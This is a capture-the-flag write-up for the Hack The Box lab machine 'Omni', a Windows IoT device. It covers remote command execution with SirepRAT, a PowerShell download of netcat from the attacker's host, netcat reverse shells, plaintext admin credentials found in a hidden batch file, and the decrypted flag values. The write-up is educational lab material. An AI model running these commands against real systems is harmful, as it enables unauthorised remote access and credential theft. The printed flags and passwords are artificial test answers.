# Box Information

```
Name:       | Omni
OS:         | Other
Difficulty: | Easy
Points:     | 20
Release:    | 22 Aug 2020
IP:         | 10.10.10.204
```

# Reconnaissance

## Nmap scan

```
nmap -sC -sV -T4 -p- -oA scans/nmap.full 10.10.10.204
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 19:47 CEST
Nmap scan report for 10.10.10.204
Host is up (0.048s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/26%Time=5F46A0B4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.72 seconds
```

- Not much so I need to do more enumeration!

## http - 8080

The page needs a username and a password.

![needcreds](img/needcreds.png)

> Windows Device Portal

I searched for this text and I found out this is a **Windows IOT** Device.

![iot.png](img/iot.png)

# Exploitation

I searched for `windows IOT RCE` in duckduckgo and I found an interesting github repo.

![winiotrce](img/winiotrce.png)

[https://github.com/SafeBreach-Labs/SirepRAT](https://github.com/SafeBreach-Labs/SirepRAT)

I cloned the repository.

```
git clone https://github.com/SafeBreach-Labs/SirepRAT
```

Usage(everything is in the readme btw):

```
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c <command>" --v
```

## Transfering nc.exe to the target

I can upload an nc.exe binary then use it in order to get an easy reverse shell.  
I downloaded [**netcat 1.11**](https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip) from [https://eternallybored.org/misc/netcat/](https://eternallybored.org/misc/netcat/).

I started a python3 http.server in this dir.

```
sudo python3 -m http.server 80 --dir /opt/nc_win/netcat-1.11/
```

I used SirepRAT.py and powershell in order to download nc.exe to the box.

```
python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.168/nc64.exe" --v
```

![nc_downloaded](img/nc_downloaded.png)

- I successfully downloaded nc64.exe to the box

## Making a reverse shell connection

I just executed nc64.exe in order to get a revshell while I was listening.

```
python2 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -e cmd.exe 10.10.14.168 1337" --v
```

![got_revshell](img/got_revshell.png)

```
$ ncx 1337
listening on [any] 1337 ...
connect to [10.10.14.168] from (UNKNOWN) [10.10.10.204] 49691
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>cd C:\
cd C:\

C:\>dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\

07/20/2020  02:36 AM    <DIR>          $Reconfig$
08/26/2020  05:52 PM            45,272 burger.exe
10/26/2018  11:35 PM    <JUNCTION>     Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018  11:37 PM    <DIR>          Program Files
10/26/2018  11:38 PM    <DIR>          PROGRAMS
10/26/2018  11:37 PM    <DIR>          SystemData
10/26/2018  11:37 PM    <DIR>          Users
07/03/2020  10:35 PM    <DIR>          Windows
               1 File(s)         45,272 bytes
               7 Dir(s)     577,171,456 bytes free

C:\>
```

Since this is an IOT windows it has a lot of commands removed. For instance `whoami` does **NOT** work.

![whoamicmd](img/whoamicmd.png)

```
C:\>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
```

But I can use powershell to get user information. So I started powershell.

```
powershell.exe -ep bypass
```

Whoami powershell alternative:

```
$env:UserName
```

Output:

```
omni$
```

![psusername](img/psusername.png)

# Privilege Escalation

## Manual Enumeration

I listed the hard drive letters.

```
wmic logicaldisk get name
```

Output:

```
wmic logicaldisk get name
Name                          = C:
Name                          = D:
Name                          = U:
```

![driveletters](img/dirveletters.png)

I listed the files and direcories on each drive.

```
C:\>dir D:\
dir D:\
The device is not ready.
```

- D:\ does not work

But the others are good. They are very similar but still different. U:\ could be a normal windows drive mounted and C:\ is the IOT windows drive.

```
C:\>dir U:\
dir U:\
 Volume in drive U is Data
 Volume Serial Number is 6A37-E09E

 Directory of U:\

10/26/2018  11:37 PM    <DIR>          CrashDump
07/04/2020  12:22 AM                 0 FirstBoot.Complete
10/26/2018  11:37 PM    <DIR>          Logfiles
10/26/2018  11:37 PM    <DIR>          Programs
07/03/2020  11:22 PM    <DIR>          SharedData
07/03/2020  11:22 PM    <DIR>          SystemData
10/26/2018  11:38 PM    <DIR>          test
07/04/2020  07:28 PM    <DIR>          Users
10/26/2018  11:38 PM    <DIR>          Windows
               1 File(s)              0 bytes
               8 Dir(s)   4,692,410,368 bytes free

C:\>dir C:\
dir C:\
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\

07/20/2020  02:36 AM    <DIR>          $Reconfig$
08/26/2020  05:52 PM            45,272 burger.exe
10/26/2018  11:35 PM    <JUNCTION>     Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018  11:37 PM    <DIR>          Program Files
10/26/2018  11:38 PM    <DIR>          PROGRAMS
10/26/2018  11:37 PM    <DIR>          SystemData
10/26/2018  11:37 PM    <DIR>          Users
07/03/2020  10:35 PM    <DIR>          Windows
               1 File(s)         45,272 bytes
               7 Dir(s)     577,597,440 bytes free
```

![files_listed](img/files_listed.png)

### C:\

I found an interesting bat file at `C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat`. The file is hidden so I need to use `dir -force`.

![dirforce](img/dirforce.png)

```
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> dir -force
dir -force


    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/26/2018  11:37 PM                1.0.0.1
-a-h--        8/21/2020  12:56 PM            247 r.bat
```

I typed it out and found some creds!

![batfile_creds](img/batfile_creds.png)

```
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
```

```
USERNAME        | PASSWORD
app             | mesh5143
administrator   | \_1nt3rn37ofTh1nGz
```

### U:\

#### Flags (encrypted)

I found both flagfiles but they are in a weird format.

***user.txt:***

```
type U:\Users\app\user.txt
```

Output:

```
C:\>type U:\Users\app\user.txt
type U:\Users\app\user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc
57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b
4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990a
f0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>
```

***root.txt:***

```
type U:\Users\administrator\root.txt
```

Output:

```
C:\>type U:\Users\administrator\root.txt
type U:\Users\administrator\root.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d
8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
    </Props>
  </Obj>
</Objs>
```

- Same weird format
- It's something with powershell
- Powershell credential mentioned

## Going back to port 8080

I went back to http://10.10.10.204:8080 and logged in as administrator.

![gotuser_root](img/gotuser_root.png)

### Revshell as admin

I can still use my nc64.exe in order to get a reverse shell as administrator.

![adminrevshell](img/adminrevshell.png)

```
C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.168 1337
```

![got_shell_root](img/got_shell_root.png)

## Decrypting the flags

https://www.jaapbrasser.com/quickly-and-securely-storing-your-credentials-powershell/
https://adamtheautomator.com/powershell-get-credential/

```
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password
```

![gotroothash](img/gotroothash.png)

```
PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt

PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
```

![box_owned](img/box_owned.png)

```
PS C:\windows\system32> $env:ComputerName
$env:ComputerName
omni
PS C:\windows\system32> $env:UserName
$env:UserName
Administrator
PS C:\windows\system32>
```

- Note: I still dont have permission to the userflag because I'm not user `app` and I get an error

So I need to log into the webapp at http://10.10.10.204:8080 as app and open a new revshell then do the same with the user.txt file.

Revshell comand:

```
C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd.exe 10.10.14.168 1338
```

Decrypting the flag:

```
$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password
```

![gotuserhash](img/gotuserhash.png)

```
PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
```
